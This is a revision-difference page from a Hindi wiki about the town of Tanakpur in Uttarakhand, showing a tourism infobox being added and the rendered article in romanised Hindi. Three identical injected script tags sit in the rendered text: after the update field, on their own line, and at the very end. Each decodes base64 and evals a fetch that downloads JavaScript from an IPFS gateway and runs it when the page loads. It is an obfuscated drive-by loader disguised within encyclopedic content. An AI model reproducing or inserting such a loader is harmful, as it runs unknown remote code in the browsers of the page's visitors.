Difference between revisions of "टनकपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
[[चित्र:Punyagiri1..jpg|thumb| [[पूर्णागिरि मेला|पूर्णागिरि मंदिर]] मार्ग से टनकपुर का विहंगम दृष्य]]
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Punyagiri1..jpg
 +
|चित्र का नाम=टनकपुर
 +
|विवरण=टनकपुर [[भारत]] के [[उत्तराखण्ड]] राज्य का एक प्रमुख नगर है। यह [[काली नदी]] के दांये किनारे पर स्थित है।
 +
|राज्य=[[उत्तराखंड]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[चम्पावत]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=29° 4′ 48″ उत्तर, 80° 7′ 12″ पूर्व
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=हवाई जहाज़, रेल, बस आदि से पहुँचा जा सकता है।
 +
|हवाई अड्डा=पंतनगर हवाई अड्डा निकटतम हवाई अड्डा है।
 +
|रेलवे स्टेशन=[[काठगोदाम]] रेलवे स्टेशन निकटतम रेलवे स्टेशन है।
 +
|बस अड्डा=
 +
|यातायात=रेल, बस तथा टैक्सी
 +
|क्या देखें=[[पूर्णागिरि मंदिर]], शारदा घाट, पंचमुखी महादेव मंदिर
 +
|कहाँ ठहरें=होटल, गेस्ट हाउस
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=05943
 +
|ए.टी.एम=लगभग सभी
 +
|सावधानी=
 +
|मानचित्र लिंक=[https://www.google.co.in/maps/dir/Uttarakhand/Tanakpur,+Uttarakhand/@29.2472336,78.441016,8z/data=!3m1!4b1!4m13!4m12!1m5!1m1!1s0x3909dcc202279c09:0x7c43b63689cc005!2m2!1d79.0192997!2d30.066753!1m5!1m1!1s0x39a10016579c8a65:0xed0a59e3283e0db6!2m2!1d80.1065646!2d29.0722375?hl=en गूगल मानचित्र टनकपुर]
 +
|संबंधित लेख=
 +
|शीर्षक 1=भाषा
 +
|पाठ 1=[[हिन्दी]]
 +
|शीर्षक 2=जनसंख्या
 +
|पाठ 2=39,000 (2011)
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|14:04, 17 अगस्त 2016 (IST)}}
 +
}}
 
'''टनकपुर''' [[उत्तराखंड]] के [[कुमाऊँ मण्डल]] के [[अल्मोड़ा]], [[नैनीताल]], [[पिथौरागढ़]], [[बागेश्वर ]], [[चम्पावत]] जनपदों तक पहुँचने के लिये अंतिम रेलवे स्टेशन है। टनकपुर [[काली नदी]] के दांये किनारे पर स्थित है (मैदानी इलाकों में आने पर इसका प्रचलित नाम [[शारदा नदी]] है) इस नदी के दूसरी ओर बांऐ किनारे पर [[नेपाल]] देश का प्रसिद्ध ब्रह्मा विष्णु का मंदिर [[ब्रह्मदेव मंदिर]] कंचनपुर में स्थित है। टनकपुर प्रतिदिन सांयःकालीन [[आरती]] का आयोजन होता है। ब्रह्मदेव कस्बे में स्थित ब्रह्मा विष्णु के मंदिर का प्रांगण टनकपुर कस्बे तक का सफर काली नदी के किनारे बने बैराज पर तय करना बहुत मोहक लगता है। बैराज के कारण निर्मित जलाशय में पड़ने वाली अस्त होते सूर्य की छटा मनमोहक है।   
 
'''टनकपुर''' [[उत्तराखंड]] के [[कुमाऊँ मण्डल]] के [[अल्मोड़ा]], [[नैनीताल]], [[पिथौरागढ़]], [[बागेश्वर ]], [[चम्पावत]] जनपदों तक पहुँचने के लिये अंतिम रेलवे स्टेशन है। टनकपुर [[काली नदी]] के दांये किनारे पर स्थित है (मैदानी इलाकों में आने पर इसका प्रचलित नाम [[शारदा नदी]] है) इस नदी के दूसरी ओर बांऐ किनारे पर [[नेपाल]] देश का प्रसिद्ध ब्रह्मा विष्णु का मंदिर [[ब्रह्मदेव मंदिर]] कंचनपुर में स्थित है। टनकपुर प्रतिदिन सांयःकालीन [[आरती]] का आयोजन होता है। ब्रह्मदेव कस्बे में स्थित ब्रह्मा विष्णु के मंदिर का प्रांगण टनकपुर कस्बे तक का सफर काली नदी के किनारे बने बैराज पर तय करना बहुत मोहक लगता है। बैराज के कारण निर्मित जलाशय में पड़ने वाली अस्त होते सूर्य की छटा मनमोहक है।   
  
  
 +
 +
 +
 +
 +
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==चित्र वीथिका==
 
==चित्र वीथिका==
 
<gallery>
 
<gallery>
Line 8: Line 51:
 
चित्र:Bramhdev.JPG|ब्रह्मदेव कस्बे में स्थित ब्रह्मा विष्णु के मंदिर का प्रांगण
 
चित्र:Bramhdev.JPG|ब्रह्मदेव कस्बे में स्थित ब्रह्मा विष्णु के मंदिर का प्रांगण
 
</gallery>
 
</gallery>
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 08:34, 17 August 2016

tanakapur
vivaran tanakapur bharat ke uttarakhand rajy ka ek pramukh nagar hai. yah kali nadi ke daanye kinare par sthit hai.
rajy uttarakhand
zila champavat
bhaugolik sthiti 29° 4′ 48″ uttar, 80° 7′ 12″ poorv
kaise pahuanchean havaee jahaz, rel, bas adi se pahuancha ja sakata hai.
havaee adda pantanagar havaee adda nikatatam havaee adda hai.
relave steshan kathagodam relave steshan nikatatam relave steshan hai.
yatayat rel, bas tatha taiksi
kya dekhean poornagiri mandir, sharada ghat, panchamukhi mahadev mandir
kahaan thaharean hotal, gest haus
es.ti.di. kod 05943
e.ti.em lagabhag sabhi
chitr:Map-icon.gif googal manachitr tanakapur
bhasha hindi
janasankhya 39,000 (2011)
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tanakapur uttarakhand ke kumaooan mandal ke almo da, nainital, pithauragadh, bageshvar , champavat janapadoan tak pahuanchane ke liye aantim relave steshan hai. tanakapur kali nadi ke daanye kinare par sthit hai (maidani ilakoan mean ane par isaka prachalit nam sharada nadi hai) is nadi ke doosari or baanai kinare par nepal desh ka prasiddh brahma vishnu ka mandir brahmadev mandir kanchanapur mean sthit hai. tanakapur pratidin saanyahkalin arati ka ayojan hota hai. brahmadev kasbe mean sthit brahma vishnu ke mandir ka praangan tanakapur kasbe tak ka saphar kali nadi ke kinare bane bairaj par tay karana bahut mohak lagata hai. bairaj ke karan nirmit jalashay mean p dane vali ast hote soory ki chhata manamohak hai.





panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

chitr vithika

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>